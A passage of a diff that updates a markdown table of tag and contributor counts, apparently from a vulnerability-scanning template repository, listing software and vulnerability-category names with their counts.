| -| alibaba | 1 | rodnt | 1 | | | | | | | -| axis | 1 | akshansh | 1 | | | | | | | -| jsf | 1 | jteles | 1 | | | | | | | -| servicenow | 1 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| expn | 1 | ratnadip gajbhiye | 1 | | | | | | | -| sco | 1 | its0x08 | 1 | | | | | | | -| h3c-imc | 1 | mohammedsaneem | 1 | | | | | | | -| powercreator | 1 | shifacyclewla | 1 | | | | | | | -| haproxy | 1 | aresx | 1 | | | | | | | -| gateone | 1 | ooooooo_q | 1 | | | | | | | -| plugin | 1 | zandros0 | 1 | | | | | | | -| duomicms | 1 | ajaysenr | 1 | | | | | | | -| addpac | 1 | berkdusunur | 1 | | | | | | | -| blind | 1 | qlkwej | 1 | | | | | | | -| netsweeper | 1 | petruknisme | 1 | | | | | | | -| javamelody | 1 | tim_koopmans | 1 | | | | | | | -| wiki | 1 | manuelbua | 1 | | | | | | | -| faraday | 1 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| ec2 | 1 | zhenwarx | 1 | | | | | | | -| mongoshake | 1 | b4uh0lz | 1 | | | | | | | -| xiuno | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | +| cve2008 | 2 | retr0 | 1 | | | | | | | +| jsf | 2 | pdp | 1 | | | | | | | +| sonicwall | 2 | affix | 1 | | | | | | | +| cve2007 | 2 | tirtha_mandal | 1 | | | | | | | +| flir | 2 | soyelmago | 1 | | | | | | | +| chiyu | 2 | schniggie | 1 | | | | | | | +| kentico | 2 | chron0x | 1 | | | | | | | +| mail | 2 | qlkwej | 1 | | | | | | | +| jeedom | 2 | berkdusunur | 1 | | | | | | | +| icewarp | 2 | apt-mirror | 1 | | | | | | | +| horde | 2 | mubassirpatel | 1 | | | | | | | +| nagios | 2 | hakluke | 1 | | | | | | | +| zhiyuan | 2 | zandros0 | 1 | | | | | | | +| odoo | 2 | taielab | 1 | | | | | | | +| jboss | 2 | knassar702 | 1 | | | | | | | +| emerge | 2 | regala_ | 1 | | | | | | | +| maian | 2 | divya_mudgal | 1 | | | | | | | +| hpe | 2 | tim_koopmans | 1 | | | | | | | +| huawei | 2 | th3.d1p4k | 1 | | | | | | | +| rstudio | 2 | sickwell | 1 | | | | | | | +| plesk | 2 | gal nagli | 1 | | | | | | | +| bigip | 2 | raesene | 1 | | | | | | | +| hjtcloud | 2 | kurohost | 1 | | | | | | | +| paloalto | 2 | 0h1in9e | 1 | | | | | | | +| microsoft | 2 | ohlinge | 1 | | | | | | | +| globalprotect | 2 | shifacyclewla | 1 | | | | | | | +| trixbox | 2 | alph4byt3 | 1 | | | | | | | +| chamilo | 2 | 0ut0fb4nd | 1 | | | | | | | +| saltstack | 2 | thezakman | 1 | | | | | | | +| activemq | 2 | ahmed sherif | 1 | | | | | | | +| openfire | 2 | pudsec | 1 | | | | | | | +| akamai | 2 | dogasantos | 1 | | | | | | | +| rockethchat | 2 | bernardofsr | 1 | | | | | | | +| openam | 2 | defr0ggy | 1 | | | | | | | +| proxy | 2 | ooooooo_q | 1 | | | | | | | +| waf | 2 | toufik airane | 1 | | | | | | | +| voipmonitor | 2 | hanlaomo | 1 | | | | | | | +| github | 2 | elder tao | 1 | | | | | | | +| cache | 2 | elmahdi | 1 | | | | | | | +| seeyon | 2 | alperenkesk | 1 | | | | | | | +| sharepoint | 2 | omarkurt | 1 | | | | | | | +| pacsone | 1 | huowuzhao | 1 | | | | | | | +| ambari | 1 | @dwisiswant0 | 1 | | | | | | | +| dotnet | 1 | vzamanillo | 1 | | | | | | | +| dotclear | 1 | noamrathaus | 1 | | | | | | | +| springframework | 1 | yashgoti | 1 | | | | | | | +| akkadian | 1 | geraldino2 | 1 | | | | | | | +| openx | 1 | fmunozs | 1 | | | | | | | +| upload | 1 | andirrahmani1 | 1 | | | | | | | +| mongoshake | 1 | bad5ect0r | 1 | | | | | | | +| acontent | 1 | johnjhacking | 1 | | | | | | | +| ricoh | 1 | mhdsamx | 1 | | | | | | | +| rfi | 1 | ratnadip gajbhiye | 1 | | | | | | | +| fuelcms | 1 | alex | 1 | | | | | | | +| hadoop | 1 | akshansh | 1 | | | | | | | +| bruteforce | 1 | kareemse1im | 1 | | | | | | | +| hiboss | 1 | _c0wb0y_ | 1 | | | | | | | +| zte | 1 | kishore krishna (sillydaddy) | 1 | | | | | | | +| razor | 1 | j3ssie/geraldino2 | 1 | | | | | | | +| xmlchart | 1 | kba@sogeti_esec | 1 | | | | | | | +| visionhub | 1 | 0xrod | 1 | | | | | | | +| cors | 1 | ipanda | 1 | | | | | | | +| beanshell | 1 | me9187 | 1 | | | | | | | +| webmodule-ee | 1 | ajaysenr | 1 | | | | | | | +| ecom | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| openemr | 1 | | | | | | | | | +| zimbra | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | | clockwatch | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| mcafee | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| sangfor | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| rfi | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| jnoj | 1 | | | | | | | | | -| pagespeed | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| manageengine | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | | wavemaker | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| solman | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | | glances | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | +| cve2005 | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| netsweeper | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| wp-theme | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| manageengine | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | | ssltls | 1 | | | | | | | | | -| horde | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| qcubed | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| ec2 | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| grav | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| firebase | 1 | | | | | | | | | +| symfony | 1 | | | | | | | | | +| mcafee | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| npm | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| azure | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| hasura | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| liferay | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| yii | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | | darkstat | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| kong | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| favicon | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| netis | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| node | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| getsimple | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| cacti | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| glpi | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | | dvr | 1 | | | | | | | | | | synnefo | 1 | | | | | | | | | -| acme | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | -| akamai | 1 | | | | | | | | | -| grav | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| azure | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| bash | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| lutron | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| default-login | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| netis | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| sceditor | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| iptime | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| flash | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| rdp | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| favicon | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| hasura | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| csrf | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| dlogin | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| tika | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | -| expressjs | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| zimbra | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| db | 1 | | | | | | | | | -| zzzcms | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| ruby | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| zend | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| ruckus | 1 | | | | | | | | | -| ilo4 | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| 2014 | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| druid | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| adminer | 1 | | | | | | | | | -| wuzhicms | 1 | | | | | | | | | -| kong | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| lighttpd | 1 | | | | | | | | | -| mailchimp | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| cacti | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| itop | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| yachtcontrol | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| harbor | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | -| exacqvision | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| eprints | 1 | | | | | | | | | -| razor | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| monitorr | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| xmlchart | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| chevereto | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | | triconsole | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| liferay | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| wifisky | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| dotclear | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| spring | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| bruteforce | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| wso2 | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| exchange | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| codeigniter | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| firebase | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | | mautic | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| wp-theme | 1 | | | | | | | | | -| cve2005 | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | +| adminer | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| harbor | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| flash | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | | optiLink | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| visualtools | 1 | | | | | | | | | -| sitecore | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | | backdoor | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| glpi | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| akkadian | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| discourse | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | | webmin | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| symfony | 1 | | | | | | | | | -| node | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| magicflow | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| javafaces | 1 | | | | | | 